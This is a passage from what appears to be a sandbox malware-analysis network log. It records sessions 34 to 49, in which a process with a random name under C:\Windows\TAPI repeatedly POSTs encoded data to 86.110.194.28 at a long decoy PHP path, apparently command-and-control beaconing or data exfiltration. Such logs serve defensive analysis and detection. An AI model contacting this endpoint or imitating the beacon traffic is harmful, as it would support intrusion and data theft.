Jan 3, 2025 07:58:17.418749094 CET | 2080 | OUT | Data Raw: 5b 5c 5e 5d 58 5a 50 59 54 5b 59 5a 5b 5e 57 5d 5f 50 5a 55 52 53 50 46 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [\^]XZPYT[YZ[^W]_PZURSPFZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&C+!6<1+)._'7)%/)P"$6 +37&?(W?#Y'$X.
Jan 3, 2025 07:58:17.785315990 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:17.924994946 CET | 380 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 06:58:17 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 152
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 0d 1d 24 58 25 05 3a 5b 29 2f 06 07 31 0a 21 12 35 0e 28 1a 2f 1e 0f 1c 22 5a 29 11 31 15 02 1d 3f 03 3e 41 28 0d 2a 0d 37 00 39 52 2b 30 28 5d 03 10 39 5c 3f 04 20 04 28 3d 31 58 2d 27 0d 5c 24 37 28 5c 3d 0a 2e 09 31 5a 3d 0c 21 5b 33 10 29 1d 2e 07 24 2b 3f 02 3f 30 2b 5a 24 2d 20 54 0b 17 24 0c 27 33 23 12 25 06 21 58 2a 09 38 10 26 2a 25 51 21 3c 0c 56 37 00 28 5d 38 30 3a 0d 27 38 2d 53 3d 07 20 0a 26 03 36 11 33 01 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                        Data Ascii: $X%:[)/1!5(/"Z)1?>A(*79R+0(]9\? (=1X-'\$7(\=.1Z=![3).$+??0+Z$- T$'3#%!X*8&*%Q!<V7(]80:'8-S= &63.\#(U4WP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 49844 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:17.156656027 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2516
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 07:58:17.511759996 CET | 2516 | OUT | Data Raw: 5e 52 5b 58 5d 5d 50 5f 54 5b 59 5a 5b 5e 57 53 5f 51 5a 5a 52 52 50 41 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^R[X]]P_T[YZ[^WS_QZZRRPAZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&<!_!* W&Z,B*]=0)Z'?)R"&78X'$??#Y'$X.
Jan 3, 2025 07:58:17.874753952 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:18.007606983 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 06:58:17 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 49853 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:18.162906885 CET | 304 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2516
Expect: 100-continue
Jan 3, 2025 07:58:18.511818886 CET | 2516 | OUT | Data Raw: 5b 51 5e 5c 5d 5a 55 5a 54 5b 59 5a 5b 53 57 5b 5f 50 5a 58 52 50 50 49 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [Q^\]ZUZT[YZ[SW[_PZXRPPIZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%+-=!&<<B);&X$)Z%?!79#;7$(D'$?9#Y'$X.1
Jan 3, 2025 07:58:18.867566109 CET | 176 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 33 20 4a 61 6e 20 32 30 32 35 20 30 36 3a 35 38 3a 31 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a 3f 55 5d 54
                                                                                                                                                                        Data Ascii: HTTP/1.1 200 OKDate: Fri, 03 Jan 2025 06:58:18 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 4Content-Type: text/html; charset=UTF-8?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 49858 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:18.996853113 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2516
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 07:58:19.355535984 CET | 2516 | OUT | Data Raw: 5e 52 5e 5b 58 58 55 58 54 5b 59 5a 5b 54 57 5e 5f 50 5a 5b 52 53 50 42 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^R^[XXUXT[YZ[TW^_PZ[RSPBZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%+!]5'1</>*$7>2,5P5'!W#+7'3<$T+9#Y'$X.-
Jan 3, 2025 07:58:19.687212944 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:19.824778080 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 06:58:19 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 49864 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:19.951108932 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2516
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 07:58:20.308636904 CET | 2516 | OUT | Data Raw: 5b 54 5b 58 5d 5b 55 58 54 5b 59 5a 5b 56 57 5a 5f 54 5a 5c 52 55 50 47 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [T[X][UXT[YZ[VWZ_TZ\RUPGZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&E?5Z#:2<;=+6Z'4&Y6"7* ;(X0#&???#Y'$X.%
Jan 3, 2025 07:58:20.642127991 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:20.777724981 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 06:58:20 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 49870 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:20.929619074 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2516
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 07:58:21.277426004 CET | 2516 | OUT | Data Raw: 5b 51 5b 5f 5d 59 55 5f 54 5b 59 5a 5b 56 57 5f 5f 50 5a 5d 52 53 50 47 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [Q[_]YU_T[YZ[VW__PZ]RSPGZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&C?_"8T$/ B=>['7%%<:549Q +30)<A$$+)#Y'$X.%
Jan 3, 2025 07:58:21.662894011 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:21.796560049 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 06:58:21 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 49879 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:21.949522972 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
    Host: 86.110.194.28
    Content-Length: 2516
    Expect: 100-continue
    Connection: Keep-Alive
Jan 3, 2025 07:58:22.308644056 CET | 2516 | OUT | request body
Jan 3, 2025 07:58:22.651259899 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:22.782488108 CET | 207 | IN | HTTP/1.1 200 OK
    Date: Fri, 03 Jan 2025 06:58:22 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 4
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    Data Raw: 3f 55 5d 54
    Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 49886 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:22.908792973 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
    Host: 86.110.194.28
    Content-Length: 2516
    Expect: 100-continue
    Connection: Keep-Alive
Jan 3, 2025 07:58:23.262917042 CET | 2516 | OUT | request body
Jan 3, 2025 07:58:23.597631931 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:23.728682041 CET | 207 | IN | HTTP/1.1 200 OK
    Date: Fri, 03 Jan 2025 06:58:23 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 4
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    Data Raw: 3f 55 5d 54
    Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 49888 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:22.940787077 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
    Host: 86.110.194.28
    Content-Length: 2108
    Expect: 100-continue
    Connection: Keep-Alive
Jan 3, 2025 07:58:23.293240070 CET | 2108 | OUT | request body
Jan 3, 2025 07:58:23.638592005 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.4 | 49894 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:23.858963013 CET | 304 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
    Host: 86.110.194.28
    Content-Length: 2516
    Expect: 100-continue
Jan 3, 2025 07:58:24.215045929 CET | 2516 | OUT | request body
Jan 3, 2025 07:58:24.542840958 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:24.675411940 CET | 151 | IN | HTTP/1.1 200 OK
    Date: Fri, 03 Jan 2025 06:58:24 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 4
    Content-Type: text/html; charset=UTF-8
    Data Raw: 3f 55 5d 54
    Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 49900 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:24.817399025 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
    Host: 86.110.194.28
    Content-Length: 2516
    Expect: 100-continue
    Connection: Keep-Alive
Jan 3, 2025 07:58:25.168042898 CET | 2516 | OUT | request body
Jan 3, 2025 07:58:25.510713100 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:25.639461040 CET | 207 | IN | HTTP/1.1 200 OK
    Date: Fri, 03 Jan 2025 06:58:25 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 4
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    Data Raw: 3f 55 5d 54
    Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.4 | 49909 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:25.775222063 CET | 304 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
    Host: 86.110.194.28
    Content-Length: 2516
    Expect: 100-continue
Jan 3, 2025 07:58:26.121156931 CET | 2516 | OUT | request body
Jan 3, 2025 07:58:26.466094971 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:26.598798037 CET | 151 | IN | HTTP/1.1 200 OK
    Date: Fri, 03 Jan 2025 06:58:26 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 4
    Content-Type: text/html; charset=UTF-8
    Data Raw: 3f 55 5d 54
    Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.4 | 49915 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:26.722038031 CET | 304 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
    Host: 86.110.194.28
    Content-Length: 2516
    Expect: 100-continue
Jan 3, 2025 07:58:27.074531078 CET | 2516 | OUT | request body
Jan 3, 2025 07:58:27.404208899 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:27.535804987 CET | 151 | IN | HTTP/1.1 200 OK
    Date: Fri, 03 Jan 2025 06:58:27 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 4
    Content-Type: text/html; charset=UTF-8
    Data Raw: 3f 55 5d 54
    Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.4 | 49923 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:27.658875942 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
Jan 3, 2025 07:58:28.011814117 CET | 2516 | OUT | Data Raw: 5b 50 5e 58 5d 5a 55 58 54 5b 59 5a 5b 51 57 5c 5f 50 5a 55 52 54 50 47 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [P^X]ZUXT[YZ[QW\_PZURTPGZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%(="!R%(E*+&3:2<=R5:4($9C'<R<#Y'$X.9
Jan 3, 2025 07:58:28.366872072 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:28.498620033 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:28 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.4 | 49929 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:28.630386114 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2512
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.4 | 49933 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:28.736430883 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2108
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
Jan 3, 2025 07:58:29.090044022 CET | 2108 | OUT | Data Raw: 5e 50 5b 5f 58 59 50 5b 54 5b 59 5a 5b 51 57 59 5f 50 5a 5b 52 5d 50 47 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^P[_XYP[T[YZ[QWY_PZ[R]PGZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&)>Z50T&/0>3=Y&<)S"$) 8$$) $?,)9#Y'$X.9
Jan 3, 2025 07:58:29.425896883 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:29.558742046 CET | 380 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:29 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 0d 1d 24 1e 26 3b 31 01 3e 3f 06 03 26 0d 36 00 22 30 38 59 2f 20 32 09 35 5a 39 58 25 3b 24 51 2b 3e 2e 40 3c 0d 22 09 20 00 04 0c 2b 0a 28 5d 03 10 39 10 3c 2e 23 11 2a 07 35 5f 2e 19 2f 5e 27 27 06 5b 3e 23 0b 57 27 2f 3d 0c 36 04 3b 54 3d 33 3d 5e 24 38 30 5c 2a 30 20 02 25 2d 20 54 0b 17 24 0e 27 33 33 5b 32 3b 21 5a 3e 09 1a 5b 27 04 26 08 22 2f 32 52 20 2a 38 5e 2f 56 29 11 27 16 22 0a 3e 2e 2b 1f 26 14 36 5d 33 2b 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                        Data Ascii: $&;1>?&6"08Y/ 25Z9X%;$Q+>.@<" +(]9<.#*5_./^''[>#W'/=6;T=3=^$80\*0 %- T$'33[2;!Z>['&"/2R *8^/V)'">.+&6]3+.\#(U4WP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.4 | 49934 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:28.891230106 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
Jan 3, 2025 07:58:29.247081995 CET | 2516 | OUT | Data Raw: 5b 50 5e 51 5d 5e 50 50 54 5b 59 5a 5b 5e 57 58 5f 51 5a 54 52 5d 50 43 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [P^Q]^PPT[YZ[^WX_QZTR]PCZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%(>!:3&?/=(2^075%?!"* ^+09&<0W?#Y'$X.
Jan 3, 2025 07:58:29.579876900 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:29.706604004 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:29 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


